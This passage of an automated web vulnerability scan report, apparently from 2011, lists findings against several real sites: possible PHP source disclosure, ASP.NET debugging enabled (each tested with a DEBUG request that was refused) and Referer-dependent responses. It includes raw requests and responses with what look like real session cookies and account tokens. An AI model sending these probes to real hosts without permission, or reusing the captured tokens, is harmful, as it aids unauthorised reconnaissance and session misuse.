Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; s1=`0; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Accept-Ranges: bytes
ETag: W/"1636-1303251687426"
Last-Modified: Tue, 19 Apr 2011 22:21:27 GMT
Content-Length: 1636
Date: Fri, 06 May 2011 22:42:18 GMT
Connection: close

.PNG
.
...IHDR...,...S.............tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 ">
...[SNIP]...
</x:xmpmeta> <?xpacket end="r"?>..M"....PLTE..i..........2X.5].....9..f.....1.-O.....m.7J......F......3Y..........5\.0T....7N.4Z.....P.8R....7O.4\....8O..9.....=.....b..O.:`..p..E./S.....Y.....e..Q........k.6[....8P.7U.8S.......8T...
...[SNIP]...
20.3. http://www.secureworks.com/lib/js/state4.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.secureworks.com
Path:   /lib/js/state4.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /lib/js/state4.js HTTP/1.1
Host: www.secureworks.com
Proxy-Connection: keep-alive
Referer: http://www.secureworks.com/compliance/comp/pci.html?_kk=6713825b-9989-43cb-8a7b-5c5635138b40&_kt=6426467207&gclid=CMm21t3V1KgCFcPd4AodU3_CiA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:17:25 GMT
Server: Apache
Last-Modified: Thu, 07 Apr 2011 19:04:19 GMT
ETag: "440033-4728-4a058c6c1d2c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript
Content-Length: 18216

/* This script and many more are available free online at
The JavaScript Source :: http://javascript.internet.com
Created by: Down Home Consulting :: http://downhomeconsulting.com */

/*
Country
...[SNIP]...
r otherwise, arising from, out of or in connection with the software or the use or other dealings in the software.

*/

// If you have PHP you can set the post values like this
//var postState = '<?= $_POST["state"] ?>';
//var postCountry = '<?= $_POST["country"] ?>';
var postState = '';
var postCountry = '';

// State table
//
// To edit the list, just delete a line or add a line. Order is important.
// The order displayed here is the order it appears on
...[SNIP]...
21. ASP.NET debugging enabled  previous  next
There are 5 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targetted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

21.1. http://4qinvite.4q.iperceptions.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://4qinvite.4q.iperceptions.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: 4qinvite.4q.iperceptions.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Fri, 06 May 2011 18:40:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
21.2. http://www.dhmiservices.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dhmiservices.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.dhmiservices.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Fri, 06 May 2011 18:39:56 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39
Set-Cookie: BIGipServerdhmweb_http_pool=2237947146.20480.0000; expires=Fri, 06-May-2011 20:39:56 GMT; path=/

Debug access denied to '/Default.aspx'.
21.3. http://www.leadlife.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.leadlife.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.leadlife.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Fri, 06 May 2011 21:55:40 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
21.4. http://www.sutherlandglobal.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sutherlandglobal.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.sutherlandglobal.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Fri, 06 May 2011 21:55:21 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
21.5. http://www.visitor-track.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.visitor-track.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: www.visitor-track.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sat, 07 May 2011 01:23:07 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
P3P: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.
22. Referer-dependent response  previous  next
There are 4 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

22.1. http://depot.activalive.com/app/deployment.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://depot.activalive.com
Path:   /app/deployment.php

Request 1

GET /app/deployment.php?id=5930&ptid=5930-13937bf0e-a621-46f8-934f-34f158f4a901&stid=13937bf0e-a621-46f8-934f-34f158f4a901&oref=Direct&chat=null&r=0.5038613956421614&d[]=5221&b[]=14187 HTTP/1.1
Host: depot.activalive.com
Proxy-Connection: keep-alive
Referer: http://www.firehost.com/secure-hosting/pci?_kk=PCI%20compliance%20scanning&_kt=538c084f-5d5b-43c7-83f9-c71a7300c9e6&gclid=CLyMisrV1KgCFQNx5Qodz0X8fA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:18:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Content-Length: 469
Connection: close
Content-Type: text/javascript;charset=iso-8859-1

_alc.monitoring.push(5221);
_alc.__setStartDeptStatus(5221, true);
delete _alc.__setStartDeptStatus;
_alc.setup(10596, 5930);
_alc.handleInvite = _alc.rollDownInvite;
_alc.handleInviteRejection = _alc.rollBackInvite;
_alc.addChatRequestNotificationHandler(_alc.googleTrack);
_alc.getButton(10433).disable();if ( typeof(activaDeclinedChat) == 'undefined') { _alc.getButton(10435).disable(); } else if(!("true" != activaDeclinedChat)) { _alc.getButton(10435).disable(); }

Request 2

GET /app/deployment.php?id=5930&ptid=5930-13937bf0e-a621-46f8-934f-34f158f4a901&stid=13937bf0e-a621-46f8-934f-34f158f4a901&oref=Direct&chat=null&r=0.5038613956421614&d[]=5221&b[]=14187 HTTP/1.1
Host: depot.activalive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:18:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.13
Content-Length: 0
Connection: close
Content-Type: text/javascript;charset=iso-8859-1

22.2. http://www.expedia.com/daily/service/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /daily/service/default.asp

Request 1

GET /daily/service/default.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=flex&subm=1&city=AUS&citd=DTW&date1=&mnth=5/1/2011&rgst=1&rged=10&fxst=0&load=1&cAdu=1&rfrr=-429
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_FLTFLEX_CALENDAR%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/daily/service/default.asp%252526ot%25253DA%3B

Response 1

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww%2Eexpedia%2Ecom%2Fpub%2Fagent%2Edll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D%2D429%3F
Content-Length: 17530
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private
Date: Fri, 06 May 2011 22:40:06 GMT
Connection: close
Vary: Accept-Encoding


<!--::163099::-->


<HTML>
<HEAD>
<LINK REL=stylesheet HREF="/daily/common/style-daily.css">

<TITLE>Customer Service</TITLE>

<script language="javascript" src="http://media.expedia.com/media/content/expus/flash/tutorials/itin/launcher.js"></script>

</HEAD>

<BODY BGCOLOR=#FFFFFF LINK=#333399 VLINK=#660066 ALINK=#333399 TOPMARGIN=0 LEFTMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0>

<BASEFONT FACE="Arial,Helvetica,San Serif" size=2>
<!--::163099::-->

<link rel="stylesheet" type="text/css" href="/daily/styles/main.css?v=4" />


<script type="text/javascript" language="javascript" src="/daily/js/common.js.asp"></script>




<script language="javascript" src="http://media.expedia.com/media/content/expus/flash/tutorials/itin/launcher.js"></script>
<script language="javascript" src="/daily/js/flash.js"></script>
<script language="vbscript" src="/daily/js/flash.vbs"></script>

       <script language="javascript" type="text/javascript" src="/static/default/default/scripts/popunder.js?v=release-2011-05-r1.3.182136"></script>
<div id="xp-hdr" style="float:left;">
   <script type="text/javascript">
       if (typeof xp === "undefined"){
           var xp = {};
       }
   
       if (typeof xp.namespace === "undefined"){
           xp.namespace = function() {
               var args = arguments, root = null, pkg;
               for (i=0; i<args.length; i=i+1) {
                   pkg = args[i].split('.');
                   root = window;
                   
                   for (j=0; j<pkg.length; j=j+1) {
                       root[pkg[j]] = root[pkg[j]] || {};
                       root = root[pkg[j]];
                   }
               }
               return root;
           };
       }
   
       xp.namespace("xp.nav");
       xp.nav.track
...[SNIP]...

Request 2

GET /daily/service/default.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_FLTFLEX_CALENDAR%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/daily/service/default.asp%252526ot%25253DA%3B

Response 2

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: http://support.expedia.com/app/home/uurl/%3F
Content-Length: 17530
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private
Date: Fri, 06 May 2011 22:40:35 GMT
Connection: close
Vary: Accept-Encoding


<!--::163099::-->


<HTML>
<HEAD>
<LINK REL=stylesheet HREF="/daily/common/style-daily.css">

<TITLE>Customer Service</TITLE>

<script language="javascript" src="http://media.expedia.com/media/content/expus/flash/tutorials/itin/launcher.js"></script>

</HEAD>

<BODY BGCOLOR=#FFFFFF LINK=#333399 VLINK=#660066 ALINK=#333399 TOPMARGIN=0 LEFTMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0>

<BASEFONT FACE="Arial,Helvetica,San Serif" size=2>
<!--::163099::-->

<link rel="stylesheet" type="text/css" href="/daily/styles/main.css?v=4" />


<script type="text/javascript" language="javascript" src="/daily/js/common.js.asp"></script>




<script language="javascript" src="http://media.expedia.com/media/content/expus/flash/tutorials/itin/launcher.js"></script>
<script language="javascript" src="/daily/js/flash.js"></script>
<script language="vbscript" src="/daily/js/flash.vbs"></script>

       <script language="javascript" type="text/javascript" src="/static/default/default/scripts/popunder.js?v=release-2011-05-r1.3.182136"></script>
<div id="xp-hdr" style="float:left;">
   <script type="text/javascript">
       if (typeof xp === "undefined"){
           var xp = {};
       }
   
       if (typeof xp.namespace === "undefined"){
           xp.namespace = function() {
               var args = arguments, root = null, pkg;
               for (i=0; i<args.length; i=i+1) {
                   pkg = args[i].split('.');
                   root = window;
                   
                   for (j=0; j<pkg.length; j=j+1) {
                       root[pkg[j]] = root[pkg[j]] || {};
                       root = root[pkg[j]];
                   }
               }
               return root;
           };
       }
   
       xp.namespace("xp.nav");
       xp.nav.trackAnalytics = function (obj, type, id){
           if('undefined' != typeof(s_exp_trackClick) && s_exp_trackClick){
               s_exp_trackClick(obj, type, id);            
           }
           return true;
       }    

       xp.namespace("xp.nav.event
...[SNIP]...
22.3. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Request 1

GET /plugins/activity.php?site=www.allatsea.net&width=300&height=300&header=true&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.115.132
X-Cnection: close
Date: Fri, 06 May 2011 21:06:47 GMT
Content-Length: 11652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="allatsea.net" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://allatsea.net/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u600741_3"><input value="Sign Up" type="submit" id="u600741_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u600740_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u600740_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_6582dfb871f5100f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/May_2011/Profile_Puerto_Rican_Jaime_Torres" title="Profile Puerto Rican Jaime Torres" target="_top"><img class="img" src="http://www.allatsea.net/assets/ads/latestissue.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.allatsea.net/article/May_2011/Profile_Puerto_Rican_Jaime_Torres" target="_top">Profile Puerto Rican Jaime Torres</a></strong><div class="recommendations_metadata">34 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_5bd1c02532884631"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/May_2011/Big_Breeze_and_Lumpy_Seas_Spiced_Up_the_Action_at_Antigua_Sailing_Week_2011_" title="Big Breeze and Lumpy Seas Spiced Up the Action at Antigua Sa
...[SNIP]...

Request 2

GET /plugins/activity.php?site=www.allatsea.net&width=300&height=300&header=true&colorscheme=light HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.118.127
X-Cnection: close
Date: Fri, 06 May 2011 21:07:14 GMT
Content-Length: 11575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u603493_3"><input value="Sign Up" type="submit" id="u603493_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u603493_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u603493_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_1a21509038b87b13"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/May_2011/Profile_Puerto_Rican_Jaime_Torres" title="Profile Puerto Rican Jaime Torres" target="_top"><img class="img" src="http://www.allatsea.net/assets/ads/latestissue.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.allatsea.net/article/May_2011/Profile_Puerto_Rican_Jaime_Torres" target="_top">Profile Puerto Rican Jaime Torres</a></strong><div class="recommendations_metadata">34 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_24724f0d7bc52d2d"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.allatsea.net/article/May_2011/Big_Breeze_and_Lumpy_Seas_Spiced_Up_the_Action_at_Antigua_Sailing_Week_2011_" title="Big Breeze and Lumpy Seas Spiced Up the Action at Antigua Sailing Week 2011" target="_top"><img class="img" src="http://www.allatsea.net/as
...[SNIP]...
22.4. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=www.facebook.com%2Fexpedia&layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&height=21&ref=header HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.73.39
X-Cnection: close
Date: Fri, 06 May 2011 22:33:36 GMT
Content-Length: 6764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
